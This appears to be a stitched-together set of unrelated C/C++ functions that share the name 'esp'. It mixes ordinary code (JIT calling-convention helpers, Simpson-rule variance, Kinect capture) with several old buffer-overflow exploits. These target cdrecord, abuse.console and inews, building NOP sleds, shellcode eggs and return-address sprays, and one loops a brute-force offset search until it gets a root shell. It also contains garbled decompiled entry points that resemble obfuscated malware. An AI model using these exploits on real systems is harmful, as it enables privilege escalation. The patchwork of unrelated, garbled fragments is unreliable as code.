unsigned Processor::call_thiscall_args(Register* obj, const char* args, va_list ap) { std::stack<Argument> arg_stack; std::unordered_set<unsigned char> used_regs; Register esp(*this, ESP, sizeof(void*) * 8); unsigned argCount = 0, floatCount = 0, intCount = 0, regCount = 0, stackBytes = 0; //Set the object as first argument if(obj) { if(!isIntArg64Register(intCount, argCount)) stackBytes += pushSize(); ++argCount; ++intCount; arg_stack.push(obj); } //Read the arguments in... while(args && *args != '\0') { if(*args == 'r') { Register* reg = va_arg(ap,Register*); if(reg->xmm()) { if(!isFloatArg64Register(floatCount, argCount)) stackBytes += pushSize(); ++floatCount; } else { if(!isIntArg64Register(intCount, argCount)) stackBytes += pushSize(); ++intCount; } ++regCount; arg_stack.push(reg); } else if(*args == 'm') {
__entry_point__() { ecx = ecx & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173 & 155407173; eax = eax + ecx; ecx = ecx + edx; (save)0; *__imp__GetModuleHandleA(); asm("Unknown opcode 0x0f"); asm("Unknown opcode 0xc6"); asm("hlt"); edx = esp; for((save)149630669; 1; eax = eax - 149630660) { (restore)eax; } (save)edx; (save)eax; asm("rol dword [esp],0x5"); (restore)edx; asm("bswap edx"); *esp = *esp + edx + -1476385172; *esp(); asm("adc eax,+0x35"); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *__imp__GetModuleHandleA(); (save)0; *L20402008(); }
int main(int argc, char *argv[]) { long addr; char buf[LENGTH]; char egg[EGGIE]; int i,offset; printf("cdrecord exploit by sectorx (FreeBSD)\n"); if (argc < 2) { printf("error: offset must be supplied as a parameter\n"); printf("*note* FreeBSD 3.3-RELEASE\'s offset is 600\n\n"); return; } offset = atoi(argv[1]); addr = esp()+offset; printf("Using offset 0x%x [%d], eip = 0x%x\n",offset,offset,addr); /* build the overflow string */ for (i=0;i<LENGTH;i+=4) *(long*)&buf[i] = addr; buf[LENGTH-1] = '\0'; /* build the egg string */ memset(&egg,0x90,sizeof(egg)); memcpy(egg+(EGGIE-strlen(devilspawn)-1),devilspawn,strlen(devilspawn)); egg[EGGIE-1] = '\0'; setenv("EGG",egg,1); execl("/usr/local/bin/cdrecord","cdrecord-bin","dev=",buf,"/etc/fstab",0); }
void bruteforce(char **path) { pid_t pid; int x=0, offset=5; long ret; printf("attemping brute force\n\n"); if(!getuid()) { printf("brute force cannot be run while uid is 0\n"); exit(0); } ret=esp()+offset; while(getuid()&&(x<=3000&&x>=-3000)) { if((pid=fork())==0) { exploit(ret,path); exit(0); } else perror("fork failed"); if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error"); if(x>=3000) { ret=esp(); x=-1; } else if(x<=3000&&x>=0) { ret+=offset; x+=offset; } else if(x>=-3000&&x<0) { ret-=offset; x-=offset; } printf("%d\n\n",x); } printf("brute force complete..\n\n"); system("id"); }
void run() { int i; for (i = 0; tab[i].believe != NULL; i++) { printf("f(x) = %s\n", tab[i].info); printf("E(x) = %.3f\n", esp(tab[i].believe, tab[i].failboat, tab[i].wincopter)); printf("Var(x) = %.3f\n\n", var(tab[i].believe, tab[i].failboat, tab[i].wincopter)); } }
void Processor::call_cdecl_end(unsigned argBytes, bool returnPointer) { Register esp(*this, ESP, sizeof(void*) * 8); unsigned stackOffset = (stackDepth + argBytes) % 16; if(stackOffset != 0) argBytes += (16 - stackOffset); #ifndef _MSC_VER if(returnPointer) argBytes -= 4; #endif if(argBytes != 0) esp += argBytes; }
main(int argc, char **argv) { int i,j,offset; unsigned long eip; char buffer[4096]; j=0; offset=atoi(argv[1]); eip=esp()+offset; for(i=0;i<1008;i++) buffer[i]=0x90; for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++]; i=1005; buffer[i]=eip & 0xff; buffer[i+1]=(eip >> 8) & 0xff; buffer[i+2]=(eip >> 16) & 0xff; buffer[i+3]=(eip >> 24) & 0xff; printf("%s\nsh -i\n",buffer); }
void main(int argc,char *argv[]) { char cmd[1000]; int i,x; long retn; char buff[LEN]; printf("\nUsage :- %s <offset>\n..",argv[0]); if(argc>1) retn=esp()-atoi(argv[1]); else retn=RET; printf("Using return Adress :- ",retn ); for(i=0;i<LEN;i+=4) { *(long*)&buff[i]=retn; } for(i=0;i<(LEN-(strlen(shellcode)+8));i++) { *(buff+i)=NOP; } memcpy(buff+i,shellcode,strlen(shellcode)); sprintf(cmd,"/usr/lib/games/abuse/abuse.console -net %s",buff); puts("executing ......."); system(cmd); return; }
int main(int argc,char **argv){ char bof[600]; // give or take a few. (528) int i,offset,gid=NEWSGID; long ret; FILE *inewsfile; if(argc>1){offset=atoi(argv[1]);} else{offset=DEFAULT_OFFSET;} ret=(esp()-offset); for(i=ALIGN;i<600;i+=4){*(long *)&bof[i]=ret;} exec[10]=gid; for(i=0;i<(600-strlen(exec)-100);i++){*(bof+i)=0x90;} memcpy(bof+i,exec,strlen(exec)); unlink(TMPFILE); // clean house. inewsfile=fopen(TMPFILE,"w"); fprintf(inewsfile,"From: %s\n",bof); // required, woops. fprintf(inewsfile,"Newsgroups: %s\n",NEWSGROUP); // required. fprintf(inewsfile,"Subject: %s\n\n",SUBJECT); // required. fclose(inewsfile); printf("[ return address: 0x%lx, offset: %d, actual size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec)); if(execlp(PATH,"inews","-h",TMPFILE,0)){ printf("%s: failed, is %s the correct path?\n",argv[0],PATH); exit(-1); } }
int main(int argc, char **argv) { int cnt, sel; char *offset; long returnaddr; if(argc == 1) { usage((char **)argv[0]); exit(1); } while((cnt = getopt(argc,argv,"t:b:o:")) != EOF) { switch(cnt) { case 't': //target distro sel = atoi(optarg); exploit(target[sel-1].ret,(char **)target[sel-1].path); break; case 'b': //brute force bruteforce((char **)target[sel-1].path); break; case 'o': //offset offset = atoi(optarg); returnaddr=esp()+offset; sel = atoi(optarg); exploit(returnaddr,(char **)target[sel-1].path); break; default: usage(&argv[0]); break; } } return(0); }
double var(double (*believe)(), double ko, double ok) { double inc; double h; double i; double j; double m; i = 0.f; j = 0.f; m = esp(believe, ko, ok); h = (double)((double)(ok - ko) / (double)ITER); for (inc = 1.f; inc <= (ITER - 1.f); inc += 1.f) { i += (((ko + inc * h) - m) * ((ko + inc * h) - m)) * believe(ko + inc * h); } i *= 2.f; for (inc = 0.f; inc <= (ITER - 1.f); inc += 1.f) { j += (((ko + inc * h + h / 2.f) - m) * ((ko + inc * h + h / 2.f) - m)) * believe(ko + inc * h + h / 2.f); } j *= 4.f; return (((double)(ok - ko) / (6.f * ITER)) * ((ko - m) * believe(ko) + (ok - m) * believe(ok) + i + j)); }
__entry_point__() { eax = eax + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx + ecx; edx = *esp; asm("Unknown opcode 0x0f"); asm("Unknown opcode 0xc6"); asm("hlt"); for(eax = 132853453; 1; eax = eax - 132853450) { } (save)eax; *esp = *esp - 2; (restore)eax; asm("bswap eax"); (save)eax; *esp = *esp + -50321797; *esp = *esp + edx; asm("adc edx,+0x19"); eax = *esp() - 21; *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); *__imp__GetVersion(); ecx = ecx + 1; }
void Processor::call_cdecl_prep(unsigned argBytes) { unsigned stackOffset = (stackDepth + argBytes) % 16; Register esp(*this, ESP, sizeof(void*) * 8); if(stackOffset != 0) esp -= 16 - stackOffset; }
L00411768() { asm("aam 0xf0"); *eax = *eax + 1; cl = 226; *eax = *eax + 1; ss = esp; *eax = *eax + 1; -1 = esi * eax; *(eax - 72) = *(eax - 72) + 226; *eax = *eax + 1; eax = eax & 65450; *edi = al; edi = edi + 1; *eax = *eax + 1; *(edx + 2046820572) = *(edx + 2046820572) + dl; ecx = -1771962368; *eax = *eax + al; if(!(edx = edx - 1)) { } *edx = *edx + dh; (save)eax; ah = ah + dl; asm("jecxz 0x41179a"); *(ecx + -1912537145) = *(ecx + -1912537145) + dh; *edi = eax; edi = edi + 4; *eax = *eax + 1; -1 = *(edi + 1934098687) * ecx; *L0000FF57 = *L0000FF57 + ah; (save)ebp; *eax = *eax + 1; *(ecx - 36) = *(ecx - 36) + cl; *eax = *eax + al; eax :: 822083769; asm("xchg eax,esi"); *eax = *eax + al; (save)eax; ah = (eax & 419430515) + dl; asm("aam 0xff"); *(ecx + -1912537167) = *(ecx + -1912537167) + dh; asm("Unknown opcode 0x8e"); *eax = *eax + 1; 0 = *(ebx - 1) * ebp; eax = eax - 1 - 1; *eax = *eax + 1; eax = eax & 65317; bh = bh + bh; *eax = *eax + al; ah = ah + bl; *eax = *eax + al; *(ecx + -1778384896) = *(ecx + -1778384896) + bh; *eax = *eax + al; *ebx = *ebx + dh; *eax = *eax + al; (save)eax; bl = bl + ah; asm("aam 0xff"); bh = bh + al; *(ebx + -1895759986) = *(ebx + -1895759986) + 255; if(!(0 = edi * edi)) { *eax = *eax + 1; (save)edi; eax = eax & 5570815; *eax = *eax + 1; ah = ah + bl; *L3100B900 = *L3100B900 + bh; *(esi + 1929389312) = *(esi + 1929389312) + dl; *L000000FE = *L000000FE + bl; *eax = *eax + dl; asm("lock aam 0xff"); dl = dl + ah; cl = 255; ah = ah + dl; asm("Unknown opcode 0x8e"); *eax = *eax + 1; asm("Unknown opcode 0xc6"); 0 = edi * edi; eax = 72; *L00000048 = *L00000048 + 1; asm("xchg eax,edx"); ah = ah + bl; *edx = *edx + bh; } if(!( *edx = *edx + -1778359808)) { } al = al ^ *eax; (save)eax; bh = bh + bh; asm("aam 0xff"); bh = bh + bh; cl = 255; bh = bh + bh; asm("Unknown opcode 0x8e"); *eax = *eax + 1; goto ( *(ebx - 1)); bh = bh + bh; eax = eax - 1; *eax = *eax + 1; goto ( *L00ff00ff); *eax = *eax + 1; (fsave)(frestore) + *eax + *eax; ecx = -1778337536; *(esi + 1929409280) = *(esi + 1929409280) + dl; *eax = *eax + dl; (save)eax; bh = bh + bh; asm("aam 0xf0"); bh = bh + bh; ss = esp; 0 = esi * eax; *(eax - 72) = *(eax - 72) - 1; bh = bh + bh + bh + bh + bh + bh + bh + bh; *edi = eax & 16711850; edi = edi + 1; ah = ah + bl; *(edx + 2046867712) = *(edx + 2046867712) + dl; *(esi + 1929404928) = *(esi + 1929404928) + dl; *edx = *edx + 226; (save)eax; *edx = *edx + dh; bh = bh + bh; asm("aam 0xe3"); bh = bh + bh; cl = 199; gs = *(bh + bh + -1888747776); bh = bh + bh + bh + bh; if(!(eax = eax - 1)) { } goto ( *L00ff0057); (save)ebp; ah = ah + bl; *ecx = *ecx + cl; *L96003D00 = *L96003D00 + dh; *ebx = *ebx + dh; eax = eax & 419450880; bh = bh + bh; asm("aam 0xd4"); bh = bh + bh; cl = 177; bh = bh + bh; asm("Unknown opcode 0x8e"); es = *eax; goto ( *(ebx + 107)); bh = bh + bh; eax = eax - 1 - 1; bh = bh + bh; eax = eax & 16711717; *eax = *eax + al; (fsave)(frestore) + *eax; *eax = *eax + al; ecx = -1778384896; *eax = *eax + al; *ebx = *ebx + dh; *eax = *eax + al; (save)eax; *eax = *eax + al; bh = bh + bh; asm("jecxz 0x4118ef"); bh = bh + bh; asm("Unknown opcode 0xc7"); cl = 0; goto ( *(ebx + -1879113586)); if(!(-1 = *eax * eax)) { bh = bh + bh; (save)edi; ah = (eax & 5635840) + bl; ecx = ecx - 1; *eax = *eax + al; ecx = -1778384835; *eax = *eax ^ eax; *(ebx + 37) = *(ebx + 37) + dh; *eax = *eax + al; (save)eax; asm("sbb [eax],eax"); bh = bh + bh; asm("lock aam 0x0"); goto ( *edx); cl = 0; eax = *esp(); es = *eax; esi = esi + 1; -1 = *eax * eax; ah = 11141120 + bl; asm("xchg eax,edx"); *eax = *eax + al; ecx = -1778384774; asm("bound eax,[eax]"); *(ebx + 74) = *(ebx + 74) + dh; *eax = *eax + al; }
esp KinectOpenNI::get(const base::timestamp frame) { if(!_connected) { return esp(); } // QMutexLocker locker(&_mutex); g_depth.GetMetaData(g_depthMD); g_image.GetMetaData(g_imageMD); cv::Mat rgb; cv::Mat depth; const XnDepthPixel* pDepth = g_depth.GetDepthMap();//g_depthMD.Data(); depth.create(480,640,CV_16UC1); assert((g_depthMD.XRes() == depth.cols) && (g_depthMD.YRes() == depth.rows)); memcpy(depth.data,pDepth,640*480*2); const XnUInt8* pImage = g_imageMD.Data(); rgb.create(480,640,CV_8UC3); assert(g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24); memcpy(rgb.data,pImage,640*480*3); XnUInt64 F; XnDouble pixel_size; // get the focal length in mm (ZPS = zero plane distance) g_depth.GetIntProperty ("ZPD", F); // get the pixel size in mm ("ZPPS" = pixel size at zero plane) g_depth.GetRealProperty ("ZPPS", pixel_size); //qDebug() << F << pixel_size; RgbdKinect *kf = new RgbdKinect(pixel_size,F,_serial,rgb,depth,cv::Point3d(0,0,0)); SEND(types::Rgbd,kf) /* if(_sendKinectFrame) { const XnUInt8* pImage = g_imageMD.Data(); rgb.create(480,640,CV_8UC3); assert(g_imageMD.PixelFormat() == XN_PIXEL_FORMAT_RGB24); memcpy(rgb.data,pImage,640*480*3); if(_send3d) { depth = retrievePointCloudAsImage(pDepth); }else{ depth.create(480,640,CV_16UC1); memcpy(depth.data,pDepth,640*480*2); } types::Rgbd *kf = new types::Rgbd(_serial,rgb,depth,cv::Point3d(0,0,0)); if(_send3d) { SEND_TAG(types::Rgbd,kf,"3D") }else{ SEND(types::Rgbd,kf) } } if(_sendPointCloud) { // //qDebug() << "Send pc"; SEND(PointCloud,xnPoint3DToPointCloud(retrievePointCloudMap(pDepth),640*480)) }*/ //xnWaitNoneUpdateAll // g_context.WaitNoneUpdateAll(); g_context.WaitAndUpdateAll(); return esp(); }